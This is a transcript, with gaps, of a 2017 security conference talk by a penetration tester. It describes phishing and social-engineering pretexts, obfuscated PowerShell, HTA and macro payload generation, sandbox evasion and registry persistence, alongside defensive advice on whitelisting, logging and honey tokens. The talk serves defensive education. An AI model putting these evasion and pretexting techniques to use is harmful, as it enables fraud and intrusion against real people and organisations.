
BSidesSLC 2017 -- Dave Kennedy -- A Continually Changing Industry: INFOSEC

BSides SLC · 47:02 · 133 views · Published 2017-06
About this talk
The industry is under continual change with new technologies, methods of attack, and defensive strategies being formed. Companies are still struggling on how to tackle the phishing issues and exposures to their enterprise without any sign of slowing. As defenders or attackers, we need to have a mutual understanding of each other and the methods that are used. This talk dives into both offensive and defensive methods that are highly successful in attacking and defending enterprises. In addition, how as an industry do we handle changes, keep up with techniques, and continue to raise the bar on making it more difficult for hackers.
Transcript [en]

This talk today is really around what we're seeing as far as the industry. A lot of us are in a lot of different roles and there are so many different things that happen in our industry: we have everybody from malware reversers to exploit researchers to pentesters and red teamers to blue team folks to people that are in compliance and audit. So we have so many different breeds of people here today with so many different experiences, and I'll try to hit on a lot of those different areas of security and what we're seeing as far as a continuously changing industry.

I think Sean did a great introduction of myself, I don't need to go into it anymore, but I was a Marine and I was stationed in Hawaii for five years. It was a really hard duty station, a lot of sun and beaches and things like that. But I did two tours in Iraq. I did signals intelligence, so when you saw the Saddam statue fall I was already inside Iraq doing signals collection and a bunch of other stuff. I got out and I was in a small consulting shop for a little bit and then I became a

chief security officer for a Fortune 1000 company. It was interesting because going into an organization that was suits and ties, and I think at the time I was like 26, I was one of their youngest VPs in history or whatever. It's interesting having to work with a bunch of people and try to build a security program, and that's where I started to learn a lot of the stuff around actually building things in enterprises. I do work on Mr. Robot too. If you saw episode one, season five I think it was, where they're hacking into Steel

Mountain and Elliot is about to get caught because he's trying to social engineer his way into, I think it was, level five. They used the Social-Engineer Toolkit to spoof a text message and say that your husband is in the hospital, and so that got Elliot to level five. And then season 2 episode 1 they deployed ransomware to Evil Corp, I think it was Darlene that deployed ransomware to Evil Corp, and so I helped a little bit with that too. They used the Social-Engineer Toolkit. It's been fun, it's kind of cool working with different things like that and kind

of trying to portray accurate representations of hackers in the news. I'm also considered one of the world's sexiest men alive. It's not photoshopped, actually it's not photoshopped, it wasn't for me though. When I was on the Katie Couric show a couple of years ago I was a little bit heavier then; that's Big Dave and I'm Little Dave. Big Dave was talking on Katie Couric and I hacked somebody live in the audience or whatever, and Benedict Cumberbatch, who is the guy that plays Sherlock and a lot of the other movies and everything, he was coming up next and it said "up next, one of the world's

sexiest men alive", but they removed the "up next" for like a couple of seconds and I happened to be on the TV show, and of course all my buddies found out and made it go viral. So I'm sticking with it, I don't think it was an accident, I'm just going to keep going on with that and go from there. It's amazing though, that's actually a white shirt and they changed the hue and contrast to make it look like I was wearing a pink shirt, because it's tailored towards the demographics of the audience. It's amazing how they do all that stuff, but I was not wearing a pink shirt, by the way,

it's actually a blue tie. Anyway, so what we talk about today and why we're here today: it seems like when you look at what's happening in the industry today, things are evolving in all aspects, and that's a good thing. We see technology advancing at a rapid rate, technology integration into businesses to where we have to have the latest tech, we have the Internet of Things where we have devices all over our infrastructure network, and now with the CIA leaks they're hacking into the smart TVs and everything else that's out there. So you see a lot of stuff happening out there and then you see a

lot of security products coming out touting that they can fix everything around that, right? "Hey, we can fix today's problems with this specific piece of software and it's going to stop everything." When you look at how technology is moving at such a fast pace, it's really difficult for us in the security industry to get a hold of that. I think if you look at most corporations, if you have an organization of 10,000 people, we would be in a perfect world when it comes to security if we had 10,000 people dedicated to security. You could literally sit behind somebody and be like, "Nope, don't click that, that's bad,"

you know, that would be wonderful, right? We'd have an awesome life where compromises probably didn't happen. But unfortunately we don't have that capacity to be able to work with people on a day-to-day basis to introduce new technology and secure it. So you look at environments and you have a choice in a lot of organizations between complexity and simplicity, and when I say that, a lot of the things that we're doing today introduce complexity: introducing SIEMs and introducing next-generation firewalls. A good example with next-generation firewalls: usually a company has, let's just say, 10 network engineers that are

specifically focused on Cisco, right? Cisco has been what they know for the rest of their lives, they've known Cisco for 10 years and you have this whole infrastructure set up, and you want to get to the next-generation line, so you want to go with Palo Altos. So you're like, "Well hey, we're going to get next-gen, we're going to go with Palo Altos," and now you get this Palo here and you have all these 10 years of historical non-segmentation and bad security practices, and then you just use the importer tool from Cisco to Palo Alto and all of a sudden you're supposed to be next-gen, right? Now your engineers that are Cisco engineers have no idea what

they're doing with the new Palo Altos, and now you have the same rules that you had before, but then you have a whole bunch of complexity on top of it, and now you're hopefully getting better at detecting attacks somehow. So complexity isn't always a great thing in environments. When we see what's happening now, the good news is we have

companies... stops the hackers, artificial intelligence that prevents hackers from breaking into your infrastructure, right, 99.9%, goodbye data breaches, from Barracuda. Conceptual things that make absolutely no sense whatsoever and are complete marketing FUD, but yet executives see this and say, "Hey, why aren't we there yet? Why aren't we stopping 99.9% of the breaches? I want you to go with this product because it stops all of that." So you have technology that's touting artificial intelligence and machine learning, and I honestly think in the future it will be something that is absolutely applicable, but in most cases it's just a lot of marketing,

millions and millions of dollars thrown at marketing, and for us as attackers it's extremely easy to circumvent and get around. So to me, what actually works and what I see working is looking at organizations in a different way. I don't care about the technology per se, I don't care what you have in your environment, but my whole purpose in life in security is to minimize the noise. What I mean by noise is there are certain things in your environment that you can stop today, right now, with a little bit of hard work and elbow grease. You can stop a lot of the noise that you'd see today. If you look at

infection rates, was it 92% of all infections still come from executables? Executables, 92%. That was like back in the AOL days, where you're pulling malware onto someone's machine, and you had SubSeven and all that good stuff, right? We're still fighting with that today. So if you look at most of the infection rates, you can eliminate 92% of the noise by just baselining what you have in your environment, not allowing non-code-signed executables, only doing certain exceptions based off of your environment, things that actually work in environments to reduce your level of effort, and then focusing on the 8% that you really need to focus on in your environment. So

reducing the scope of what you have to do on your attack surface. I'll talk a little bit about that and what that means, but how do you really focus on what matters? If you look at focusing on what matters, and I think the new name and what you're going to be doing next year with this conference, the concept around red and blue making that purple piece is a concept that I truly believe in in this industry. A lot of us that are on the defense, we sit there all day trying to respond to incidents, and on top of that we have

meetings upon meetings upon meetings upon meetings, but yet somehow we're supposed to get that one flaw in all of our data that happens to be in our SIEM that leads to a breach, that we can detect early on so we can minimize the damage to our corporation. So we're in a very interesting dilemma, because we have blue team, which has a lot of different components that are part of the day-to-day, and doesn't necessarily understand a lot of the offensive side of how we're actively attacking. Same thing for red: when I go in and I attack specific organizations I learn new ways of defending that I've never seen before. So we'll talk a little bit about that

and what that means. If you look at everything embedded, we look at what we're dealing with on a day-to-day basis: we have to understand each other, we have to understand the red side, we have to understand the blue side, in order to come together to figure out a better approach to understanding what's going on on the attack side. You look at all these products that are out there today, they're not built from an attacker's mindset. A good example is EDRs. Are you familiar with EDRs, endpoint detection and response? It's the new buzzword, it's a whole market now that's kind of booming up there. So you have EDR, and EDRs are

supposed to give you better visibility into your environment. That's great, I think they're great tools for collecting information, very much so, like what a SIEM could do, but do you know what to look for in your environment? What those indicators of compromise look like, what those attack patterns look like? Because you don't have an entire team dedicated to red, you're going to miss a significant amount of things. A good example is like subTee's stuff that he did with regsvr32 for application whitelisting bypasses. Do you know to look for SCTs in your environment that are downloading and beaconing out to the internet? Some may, that's great, some may not. And there are different

indicators to look for in your environment that those tools can help you with, but you don't have that institutional knowledge unless you build it internally. So we have to switch our tactics around how we handle it, and you've probably heard the term hunt teaming coming out, right? The term hunt teaming, where you actively go out and look for indicators of compromise in your environments, looking for abnormal behaviors aside from what you would traditionally see in your regular monitoring and detection programs and your SIEMs. That's a great concept. So what we see oftentimes is what red does looks like magic. Most of the time it's pretty simplistic stuff, it's not heavily

sophisticated attacks, and I'll show you a few of these here in just a minute, but in a lot of cases these attacks take advantage of individuals, i.e. phishing or whatnot. Direct exploitation is much more difficult. When I target individuals I usually don't even use browser exploits anymore, and the reason for that is if I'm targeting an organization, most organizations aren't consistent across the board. Someone might be using IE as a browser, maybe Edge is another browser, maybe Chrome is another. Does everybody have the same versions of browsers that everybody supports across your entire environment? Does everybody have the same version of Adobe across their entire environment? Maybe, if you do

decent patch management. So we have a lot of different components in our environments that change how I attack an organization, and so in order for me to exploit somebody I need to know the exact operating system, the version that they're running, and the specific exploits that I'm going to target them with. That's a lot of work. But instead, if I don't want to run exploits, I can just take advantage of how Windows is designed to work, how applications are designed to work, and just have them open and download something and execute it. Macros are still great, direct data types are still great, HTA files. I still don't know why nobody is blocking HTA

extensions from their outbound internet, for what you can download on the web. Go to your web content filtering stuff now and block .hta files. It's literally full code execution, like Java applets are, and all you have to do is click open. It's pretty ridiculous, yet no one blocks it, and that's what's being actively used for those drive-bys now, with like the Adobe and Chrome updaters: "Hey, your Chrome extension is out of date, you need to update it." You go to that site and you click open and it does PowerShell injection, compromises your machine, usually establishes a keystroke logger and steals credentials. So there are a lot of things that are out

there from the hacker side that may seem like magic. So I'm going to play a video that I did on CNN. I like this one; if you've seen it I apologize, but this one on CNN was pretty funny because it shows how easy it is to get into an organization. A lot of times what I do when I'm social engineering, I'm going after a specific target, I usually do my research on the individual target. Targeting salespeople is the best by far. Like, you can be like, "Hey, I'm going to give you a million dollars, I need you to click on this malware.exe so that you

can get your proposal signed." "Okay, no problem," right? You can do whatever you need to with salespeople. Help desk is also great, marketing is great as well, but help desk is great because what's the help desk's function? To help, right? They're there to help you. Now as pentesters, when we try to simulate real-world activities, what do we do? We try to reset passwords and stuff like that, right? Well, if you try to reset somebody's password you need to know a lot of information about that person that you're targeting: date of birth, probably Social Security numbers or employee ID, things like that that they will use to help

you reset. But if you just take advantage of the help desk function to help, and you don't require anything sensitive, nothing had to be abnormal that would trigger something in their brain to say, "Hey, this is weird," you're probably okay and they're probably going to help you. And guess what? What do they typically have? Elevated rights in their environment, right? So you probably have administrative rights over at least the endpoints themselves, and I can go from Bob in IT help desk to Jane in IT that has access to server environments, and I can start attacking different systems. So targeting functions based off of specific areas in organizations is 100% applicable, and a lot of times

I'll do, like, if I'm going after sales I'll actually set up a fake business that's in their industry vertical, if they're B2B or B2C. I'll set up a certain site that's in their industry vertical that they would go for, like, "I need to spend $2 million by next week, can you help me out?" Literally, as soon as you hit the send button you're getting a response back and they're calling you on the phone and they're trying to go to your door and knocking on your door, right? So at that point in time you have whatever you want, you can get them to do whatever

you want. So this is what I did on

CNN.

This is, you know, if you Google certain companies they'll do press releases, or the credit card company will do press releases, especially if they're large, so I can tell that they use a certain credit card brand. And so I was like, "Hey, this is so-and-so fraud services," I spoofed the 888 number, "are you currently traveling internationally right now? I see a lot of transactions in Paris." And I'll just call him Bob, his name is not Bob, but I'll just say Bob. He was like, "Yeah, yeah, I'm in Paris right now, I'm sorry, I forgot to call ahead of time to let you know I was

going to Paris, everything's fine, I'm in Paris, I'll be here." I'm like, "Okay, well, how long are you going to be there for? When are you going to be departing so we can go through and mark that in your account?" He's like, "I'll be here till Friday, thank you so much, you folks are always great with it." I'm like, "Yeah, I just need to go over a couple of quick transactions just to make sure they're okay." I can tell Bob's in a really crowded area, right, and I can tell he's starting to get annoyed with me, because at this point in time he's already

said what he needed to say and he already confirmed it, but now I have to do an additional step. This is a bad position to be in in social engineering, because he's annoyed and I have a small window of time now to actually con this person into what I want to do. So what I needed to do is I needed to move him off center, what we call moving off center, so that I put him in a defensive mode where he needs me in order to fix a situation. So I started naming off some really horrible places, like underground dungeon stuff, for credit card transactions, right, horrible websites,

things that you never want to have on your corporate card, ever, in the history of corporate cards. And so Bob starts to freak out and he's like, "No, no, no, those aren't..." I'm like, "Well, you just weren't in Frankfurt a week ago at this place here? It's a known blah blah blah." He's like, "No, no, this is not me, my credit card has been compromised, what can we do?" I'm like, "Okay, don't worry, you're going to be in Paris, right?" He's like, "Yes, yes." You can hear now he's panicking a little bit, and I can do whatever I want at this point,

right? I'm like, "Hey, I need you to buy me some stuff off of Amazon." Okay, that wasn't going to happen, but I was like, "Bob, what I need you to do is I need you to give me your full credit card number for security purposes, just so I can verify who you are." Reads off his full credit card number, the CVV, the number, and I'm running it down, all of us giggling and laughing. And then I started asking him for his social security number, which I already had, but just for purposes he gives me his full social. I'm like, "Give me date of

birth." I'm like, "What's your wife's last four of her social? What's your kids' last four?" And at that point he's like, "What, what do you need my kids' for?" I'm like... anyway, so it was a good success based off of that one. ...companies pay him to find out if employees are leaving the company vulnerable. He and his

team...

Because, you know, obviously very quick to go and take advantage of help desk. I mean, you could do anything though, like the public relations folks on people's websites, you can target them individually because they always respond to media inquiries. So you can just pretend to be a media inquiry and then you can establish and have them open up an Excel document, you compromise their computer, and then whatever. So there are many ways of going after individual people. Now the issue with that is the hardest component of any security program, at least to me, is not just our attack surface of what we have out

there, but our ability to detect an attack. If you don't detect that initial intrusion, that initial point in time where somebody clicked the link, someone hit open, the help desk clicked open, at that point in time you're pretty much going blind to other techniques. Things like lateral movement start to become much more difficult, persistence hooks, command and control infrastructure, all of those things start to become much more difficult if you don't detect that initial intrusion. I'll talk a little bit about that here in just a second. You look at the weakest gaps in security that we have today: the initial reconnaissance phase of actively going after an organization, like, hey,

doing some WHOIS information, looking at the company itself, the sites that they have, looking at, hey, do I need to build or buy an exploit kit or something like that, maybe do some preliminary testing for detection, and phishing. LinkedIn, by the way, is a fantastic resource for attackers, because a lot of times people put all of their history on there, like, "Hey, we just implemented ArcSight a week ago," and now I know you have no modern detection capabilities whatsoever in your environment, because ArcSight takes like 16 years to implement, right? So I know you have nothing in your environment that's going to detect

me. Or, "Hey, we have Symantec Endpoint Protection and we did it a year and a half ago." Great, hey, I need to get around Symantec, right? So LinkedIn provides a lot of email as well. Another good thing to try too is most companies will do content filtering based off of categorization of sites, so for example a lot of people will block uncategorized sites, freshly registered domains. You can go to GoDaddy or whatever and look at previously expired sites and you can look them up in the categorizations, and you can see, hey, this has been categorized in retail and commercial, this has been categorized... You

just go buy the domain, point it to your phishing site and use it as your phishing site. It's fantastic. So just look for expired domains and it gets rid of all your categorization problems you'll ever need. So there's some good stuff there. So if I set my infrastructure up to get around your defenses, the hardest and the weakest place that we have currently today is that initial intrusion. If I don't detect how the attacker establishes access to my infrastructure, that's a problem. If you're using things like application whitelisting, a lot of them are moving more towards in-memory type attacks like PowerShell injection, other methods that rely

specifically off of that. But if I don't detect the initial intrusion, the attacker typically establishes command and control so they can operate that machine and then move to different systems. That's what we call lateral movement: using information off of one machine, let's just say it's the local hashes or Kerberos tokens or things in memory, or SPNs as a method for extraction and cracking. We'll take those credentials and we move from one system to the next system to the next system until we get access to somebody that has access to the servers, and then they have access to the servers, we need access to this database that has all the intellectual property in it. So the lateral movement

component of it, if you can't flag on that, that's also another problem and a weak area of detection. Persistence hooks are some of the easiest to detect depending on how it's done, but a lot of times it becomes very difficult. So here's a story time of some PowerShell stuff. One of our customers was using Carbon Black, and I like Carbon Black, I think it's actually a pretty decent tool. It's like sending an ion cannon throughout your network of every single piece of packet data. I've never seen anybody actually implement it fully across their environment, but it's a good tool for information, and I think

leveraging it, if you can support it, it does a good job at actually being able to query a lot of data and figure out what's going on if you know what you're doing. But we were working with a customer on a purple team exercise, and so we have two folks in the red, two folks in the blue, and they had done a really good job on PowerShell detection, especially when it comes around things like Invoke-Expression, encoded commands. If you don't know this, by the way, there are 12 different variations of encoded command, hopefully you knew that, so you don't have to do

-EncodedCommand to get around execution restriction policies, you can do -e, abbreviated, -ec, which most people don't know about. -ec is the super abbreviated version that most people don't even trigger a flag for. You can do -enc, -enco, so you can do 12 different variations of EncodedCommand. This customer had a really good set of detection criteria around those 12 specific areas of encoded command. So when we do these types of assessments we try to figure out ways around their detection to get better, and so I just recently released a new version of Unicorn and the Social-Engineer Toolkit, but I actually just released a new

version of Unicorn yesterday as I was on the plane flying here, and that does a lot more obfuscation against these types of attacks. So I heavily recommend... I'll show you an example

here. There we go, Windows is actually running, that's a good

thing. I will get it right there, we go. All right, so if you're not familiar with

...you have to keep it kind of on one command line. One of my favorite folks in the security industry, Matt Graeber, came out with the technique of leveraging PowerShell to load shellcode directly into memory. Now why that's important is most attacks rely off of dropping to disk, right? So, hey, I have to write an executable or a file of some sort and execute that on the machine and then from there compromise it. Well, with PowerShell native injection what you can do is take shellcode, machine code, directly shove it into memory and execute it and never touch disk. So it's very evasive when it comes to the types of detection you have now.

With Matthew's attack I expanded on it a little bit and I did what was called an x86 downgrade attack. So if you're running on a 32-bit or 64-bit platform, I want to have one set of shellcode that I can fit on one command line to execute on the system itself. What it does is it detects if it's on a 64-bit operating system or 32-bit, and if it's on 64-bit it'll downgrade that process to a 32-bit process and then execute the shellcode natively with 32-bit shellcode. Why that's important, though, is there was a time there where Unicorn was getting picked up by things like antivirus and stuff like

that, right? That's no longer an issue anymore whatsoever, trust me. It employs heavy obfuscation now in the new version and it doesn't get picked up by anything currently. So it's kind of a cool thing. So let's go...

...as soon as they hit open it compromises their computer. You can do the macro injection. The macro injection is really good if people still leverage macros. It's heavily obfuscated, doesn't get picked up by anything out there currently that I know of. As soon as they open up the macro it says, "Hey, Windows, this file is corrupt, please download a newer version of Windows," and it exits, but then compromises them with PowerShell injection without touching disk. So there are quite a few different methods that are built into Unicorn. A lot of those techniques are also employed in the Social-Engineer

Toolkit as well. But with the new version, if you go and run it... you can get it from github.com/trustedsec, so github.com/trustedsec, Unicorn underneath there. I'll just use windows/meterpreter. Actually, I need to get my IP address first,

and then let's give it my IP address and my local host, and then I'll do 443, and it'll go and generate the payload for you. It'll generate two pieces: the first will be the PowerShell code and the second one will be the Metasploit listener, so you just have to do msfconsole -r and then open up that RC file. But this is essentially what the attack will look like. So let me see if I can blow this up a little bit, actually I'll just nano it so you can see it there, or vi, whatever you prefer. So we can see here it starts to

run a PowerShell command. Now it's obfuscated, the variable names are obfuscated, it never actually calls EncodedCommand in any way, shape or form, or -e or -ec or anything like that, so it's going to get around traditional detection. The way that I would look at detecting this is the length of the PowerShell command itself and PowerShell itself calling out to an external IP address; those are two behaviors that you can look for, for this specific one. You can see as soon as you run this it's obfuscated. The only thing that you can also trigger on too is .value.toString(), that's also not typically used

very often. But then it'll go ahead and execute the encoded command, which is a base64-encoded string with all of our Metasploit shellcode in it. As soon as it's run it'll compromise the machine and then give you access to that computer. So let's try a little bit of a different attack, and I'll actually show you a live one here. I'll go ahead and launch Unicorn again, but instead of leaving that blank I'm going to type in hta at the end of it, and this will generate everything that I need to launch an HTA-based attack against an organization, with everything there. Now the new version I just released

yesterday, if you go to the hta_attack folder and edit the launcher, one of the things that AV was flagging on when it gets executed was wscript.exe,

modified, and it also happened to be flagging on cmd.exe. I split that up so it randomizes that, and I try to randomize as much as possible to get around anything that's out there being kind of stupid with it. Signature-based stuff is absolutely ridiculous. It was actually a funny story: Microsoft Security Essentials was flagging on, so if you did powershell -ec and you had a PowerShell command that was long, it would trigger that in Microsoft Security Essentials, but if you did -en it was fine, it wouldn't trigger on anything that was out there.

It's ridiculous, and we're seriously still at this point in security. Anyway, so I'll just copy this and I'll launch my window here.

I'm just going to create a listener real quick. Once that's good we'll go over to our Windows

machine. Come on, wake up. Let's use Internet Explorer; you can use Edge, you can use whatever you want to.

The website pops open, and it'll actually have a prompt to open. Now that's the part that decides whether or not it's successful: does the user actually click that open button? You can build those into your emails, by the way, like "hey, as part of an employee verification process you have to click open for us to verify your computer is on the domain," or whatever, right? You can make up any excuse you want to for people to click on it. But we have a high, high, high success rate at this; usually if we build our pretext right it's around 92 to 94%, and usually the reason why we don't get like 100% is

because people are on vacation. So it just depends. As soon as you get this click to open, it executes.

Most of the newer next-generation EDRs and products that are out there don't typically flag on heavy PowerShell attacks, especially obfuscated and embedded things like macros and stuff like that, so you can usually go pretty easy against that. PEs start to get a little bit, or executables tend to get a little bit, harder in a lot of cases. But that's just a good example. Now you do the same thing for

Excel: my command again, that's another one that's fine, and I think you just do "macro"; back down a directory, you do "macro". This will generate all the macro code that you need, already obfuscated for you, and it gives you the instructions on how you actually put the macro in the Excel document. So if you just open this up, there's your obfuscation, and notice here I split up "PowerShell", so if you're looking for "PowerShell" inside of there, that pokes holes right in the signatures for that. Uh-huh, what's that?

Yeah, I haven't seen Auto_Open being detected, but I know that for Microsoft Word versus Excel it's Auto_Open or AutoOpen, one word, so you have to change that based off of whether you're doing Word or Excel. So if you're using Word, I think you have to do just straight "Sub AutoOpen" and that will work. Usually I haven't seen anything actually triggering on Auto_Open itself. What sometimes will happen is some of the sandboxing technology, like WildFire, FireEye: what it'll do with those macros is put them in a virtual machine and see if it's actually calling out to the internet. In some cases like

that you can get snagged for sure. Usually you put time-based delays in there, or my favorite technique to get around that is there's VB code out there (I think I wrote a blog post on it) that does detection of CPU cores, and if CPU cores are less than two then don't run. And so what'll happen is it profiles WildFire's and FireEye's sandboxes, which are predictable sandbox containers, and it won't actually execute or move, and you can just get past that and it actually delivers to the endpoint user himself. So there's a few ways around it, depending on how you want to build it. But you know, the VB code,

what's great about VB code versus the PowerShell command is that you can make your macros as long as you want to and as complex as you want to, versus the PowerShell command itself, which has to be super condensed on the command line. So just some good tips there. I haven't seen anything flagging on Auto_Open specifically. And honestly, I will also say that I typically don't use macros as much; I will most likely use web attack vectors, because it's easier for people to click links. People always click links, all the time. So if you build your pretext good enough you don't have to worry about going through all that

sandbox stuff and their perimeter defenses; people just click the link, and if you have a decent enough reputation it doesn't typically find it. Good

question. As soon as this comes back up, okay. So, attack vector detection on this one: HTA files, block them. Just block them from the internet, please. Just block .hta files. We have like eight different other techniques that we like to use, but HTA files are still so highly successful. So are Java applets, by the way, still; I don't know why Java applets still work. But you know, block those if you can from the outside; whitelist them if you have to, absolutely. Looking inside the HTA file, if you see certain things, the length of the HTA files... I haven't seen an actual application that leverages HTAs

anymore. I think there's some, like Xerox for old print stuff, but that's all local internal things that don't need to go on the internet, so you can typically block this. Additionally, you can block the extension type through software restriction policies within Microsoft, or if you're on Windows 10 or above you can do Device Guard: block HTA extensions, or anything that has those in there, from actually running on your endpoints themselves. So you can stop a lot of that. Next thing: Microsoft's Advanced Threat Protection. Anybody see the blogs on this one, or the Twitter war that went on between Microsoft and I? It wasn't so good, but I won't go

into that; it's fine, it's all over with, we're all happy again. So, long story short, Microsoft has their Office 365 offering that they just came out with last year called Advanced Threat Protection, ATP. They also have what's called ATA, Advanced Threat Analytics. So if you're an Office 365 customer, if you're an E5 customer (you can also purchase it when you're E3; you have to contact your sales rep for it), but if you're an E5 user within Office 365 you can get Advanced Threat Protection, and it has two components. One is called Safe Links; the other one is called mail flow or something like that,

or advanced mail protection, sorry. What Safe Links does, which I'm totally against by the way, just like 100%, 90 million times against: what do we tell our users to do when we have an email that comes in with a link in it? Hover over the link. Well, first of all, don't click it, right? But second, hover over the link to make sure it's legitimate, right? So what Microsoft does is they rewrite the URL to go through their own site first, which is called Safe Links, and so when you hover over the link it just shows Safe Links. And so you click the link and it does safe stuff to check to see if it's legit or

not, which literally is only a comparison to a blacklist. Like, I was running IE exploits and everything, like straight up from like 2014, and was getting through no problem with it. It basically just rewrites the URL to see if it's in a known blacklist and then goes from there. So the thing I'd recommend is kind of staying away from that. Their mail flow piece, which is also interesting... we just lost it... there it goes, it's a glitch, oh, hang on a second, that's not me, I can do hand gestures, it's fine. But when it comes to the actual detection around

attachments like macros, there's a 15-minute delay before you can actually receive your attachment. So if you're an enterprise and you have Advanced Threat Protection put in place, you have to wait 15 minutes before you can actually open an attachment, which to me is like a huge, major business hindrance. I don't think many people would get that, but getting around that is also pretty easy. So here is an example, and I'm going to turn my sound off, because I think I have Bruce Hornsby. If you can turn the sound off on the computer... I think it's Bruce Hornsby. There we go, cool. You can turn it off. I turned it off. Sound? Yeah, off. Yeah, you don't need to

play the music, or you can play the music, I just have to talk over it. There we go, cool. All right, so here's an E5 account with Office 365, and you can see here on the left-hand side I

have e

So we look at those examples, and you know, technology can assist in what we do, but it's not going to stop what we do as humans; we are crafty little creatures, and that's what we actually focus on. And maybe someday we have artificial intelligence that replaces it. I always thought it would be kind of cool if like malware writers turned into artificial intelligence malware writers, and they had artificial intelligence battling other artificial intelligence, and it was like this big, massive malware war. I mean, it's going to happen. It's going to be so sweet. I don't know if it's going to happen in my lifetime, but I want to like

write the first AI malware that just destroys everything else, right? I mean, not really, but you know, it'd be sweet. So having an understanding of both offense and defense makes enterprises much more secure. If you look at those examples, those are specific types of attack patterns that we leverage as attackers that you can block right now with the existing technology you have in your environments; that can literally prohibit a lot of that from happening, right? HTAs, by the way, are like the new hotness. Well, it's like old hotness. There's actually a book from like 1998, it's like this old rainbow book, like a

traditional hacker book, and it's like a 900-page hacker book, I don't remember the name of it, but it's like "hey, you can get code execution within HTA." That was in 1998; it still works fantastic today. It's great. So how do we eliminate the noise and focus on what matters? I am a huge, huge, huge advocate of application whitelisting, known good. So was Matt Graeber. Matt Graeber now works at Microsoft; he went from the ATD team at Veris and went over to Microsoft. One of my favorite people; I have a huge man crush on Matt Graeber. And him and I

very much believe that if you take the effort of actually putting application whitelisting in your environment, your environment is going to be a much better place to baseline and, from there, build detection off of. You know, if we can minimize our attack surface to application whitelisting and then from there look at detection, let's just say it's at 8% of people trying to bypass application whitelisting, isn't that much easier to manage than 100%, or whatever your virus scanners aren't going to pick up on, or whatever we're trying to do? It's painful, because you have to sit there and you have to say, hey, we have to have good configuration management; hey,

we're probably going to break a bunch of stuff when we implement this; yes, we need to do this on servers; yes, we need to do this on servers; and yes, we need to do this on endpoints. Get a known good baseline and then from there look for deviations. It works. It makes it much more difficult for me as an attacker to move to different systems, to compromise other things, if you have application whitelisting in place. So you baseline known good and detect on the rest: hey, now that we know what's normal in our environment, what can we start to do to look for data in our environment that is abnormal? Now we

start getting into the cool hunt teaming things and the purple team exercises, things that actually work in environments for building those detection capabilities. Easy steps. We're not even there right now in this industry to do the cool stuff yet, the bypass techniques, the methods for attack and exploitation that we would hopefully detect in our environments, because we're not even doing known good right now, because it's too much work, it could impact the business. So do the hard stuff first; do the little elbow grease that can impact your business for a little bit. You know, obviously it's a whole political battle you have to go through with the whole operations side. For those that have

already done it successfully, congratulations; not a lot of folks are doing application whitelisting, which I don't understand. And then you can start focusing on some cool stuff, some cool stuff: lateral movement, hindering lateral movement. There's so many ways of hindering lateral movement if you look at event IDs within just your event logs. Are you pulling event logs from your endpoints? It's a good resource, by the way. You can detect things like silver tickets, Kerberos and [unclear], Mimikatz injection, especially if you have advanced logging, Sysmon. Does anybody here have Sysmon deployed to their environments? No? Sysmon's a free tool from Microsoft that gives you advanced logging into memory and what's actually

happening. So things like Mimikatz and process injection, those are all detectable based on just installing Sysmon in your environment. It's a Microsoft product; like, it's free, you can just deploy it through SCCM to the rest of your environment, you're good to go. Getting those logs is imperative for things like lateral movement. Lateral movement, if you don't know, we use lower protocols like RPC, SMB, PowerShell remoting in some cases; those have specific key lengths when you're actually authenticating to other systems. You can rip out RDP traffic and look just for specific lower-level authentication for remote systems, and look for lateral movement in your environment pretty easily with 4624 logon events. So those are a lot of

early warning detections. Having purple teams and hunt teams understanding suspicious processes, like hey, why is notepad beaconing out to the internet? Easy stuff, right? Things that aren't legit: why is rundll32 beaconing out to the internet? Why is regsvr32 downloading an SCT file and beaconing out to the internet? Those are behaviors and patterns that you can look for. Child processes that are spawned from Excel: hey, cmd.exe is being spawned from excel.exe, probably not legit. Those are all patterns and behavior that you can easily look for in your environments if you have the right logging in place. I'm a huge advocate of what we call deception, or honey tokens. There's a lot of deception techniques

you can do, like LLMNR and NBNS fake honey tokens across your network. So if someone's running Responder or Inveigh on your network, looking for that there's a specific logon event, I think it's 4648. So with Responder you can actually detect Responder nodes in your environment. What happens is Responder... the victim sends out an LLMNR multicast, so it sends it out to your environment; what an attacker does is it says "yep, I'm that server, connect to me," and it passes NetNTLMv2 or NetNTLMv1, depending on your environment, to that attacker. That attacker can then crack that password offline. It's basically getting free credentials in your network. As pen testers we consider that

cheating; it's like the easiest way of getting domain admin in environments ever. It's like, literally, turn around, like magic, credentials start flying through. What you can do is you can actually send out a honey token or honey broadcast across your network. It's just a PowerShell script that sends and looks for things, and you just put a fake username and password in there that's not a regular username or password in your environment, and if you ever see the event ID "explicit logon credentials were used to log into the remote system," it's a good indication that someone's sitting there listening to your environment, to what's actually happening. Honey tokens, another great one: you can put

credentials into memory that look like domain admins with a fake password

ibly through event log 4624 logon type and then the specific key length. If you could just look for detecting pass-the-hash, and then look at Binary Defense, you'll see a whole write-up on how to incorporate that into your SIEM environment to detect pass-the-hash in your environment; really easy to do. Suspicious processes: here's just a couple, there's a whole bunch of them, but like tracker, rundll32, MSBuild. You can call MSBuild and have it pull from a remote file share and have it executed on your machine. regsvr32 is probably one of my favorites. CBD. There's quite a few of them out there that give you

code execution. You remember sticky keys, the sticky keys trick, right? Well, you don't need to reboot anymore, by the way. So with sticky keys you had to reboot, and you take cmd.exe and rename it, or set sethc.exe to cmd.exe, and then when the machine rebooted you could hit the shift key five times and a command prompt would pop up without having to log in, and run with SYSTEM rights. But if you have access to the registry you can just set a debug flag, and you don't have to reboot or anything, under any process that you want to, or any protected Windows process you need, and then it replaces that every

time you use it. So you can actually just use that registry key and then hit the shift key next time, and you have backdoor persistence into environments. So I'd look for that registry key, because it's being actively used right now. And so, closing up here, I talked about a lot, okay, but what it comes down to is hard work. We have to actually do hard work in order to have desirable results. Application whitelisting, known good, is hard work. Getting to behavioral detection and weird things in environments is hard work. Sifting through the massive amount of logs that we deal with on a regular basis is hard work. Protecting our attack surface is

insane, right? But it's doable. Minimizing our attack surface is doable; we just have to do hard work in our environments to go and do it. So known good is hard work. It's work that is worth it to me; it's work that I see that stops me as an attacker, and it's work that has results. The thing about this is I'm excited, because I think the industry itself is moving towards some really good things. I think that we're moving to a place where we're maturing as an organization, adopting a lot of things, and I'm really excited that we have so many people here, such as BSides Salt Lake City and throughout this industry, of

talented folks that are coming with awesome research, techniques, new ways of getting around things, new ways of defending. I think we'll be okay in the long run. We're never going to secure... never going to solve security, period, but I think when we put our minds to it we'll be in a better place. Thank you very much for having me. I appreciate it, and hopefully you learned something new. Thanks.
